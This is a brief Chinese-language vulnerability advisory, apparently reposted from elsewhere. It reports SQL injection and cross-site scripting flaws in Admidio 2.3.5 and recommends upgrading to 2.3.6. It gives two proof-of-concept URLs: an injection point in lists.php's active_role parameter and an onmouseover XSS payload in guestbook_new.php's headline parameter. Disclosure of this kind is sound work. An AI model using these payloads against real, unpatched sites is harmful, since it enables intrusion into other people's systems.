标题 Admidio 2.3.5 Multiple security vulnerabilities
作者 Stefan Schurtz
影响软件: Successfully tested on Admidio 2.3.5
开发者官网:
状态:已修复
缺陷概述
Admidio 2.3.5 含 XSS 及 SQLi缺陷
==================
测试
//SQLi
/admidio-2.3.5/adm_program/modules/lists/lists.php?active_role=[sql-injection]
//XSS
/admidio-2.3.5/adm_program/modules/guestbook/guestbook_new.php?headline=" onmouseover=alert(/xss/) "
解决方案
升级到最新版 2.3.6
,涛涛电脑知识网,涛涛电脑知识网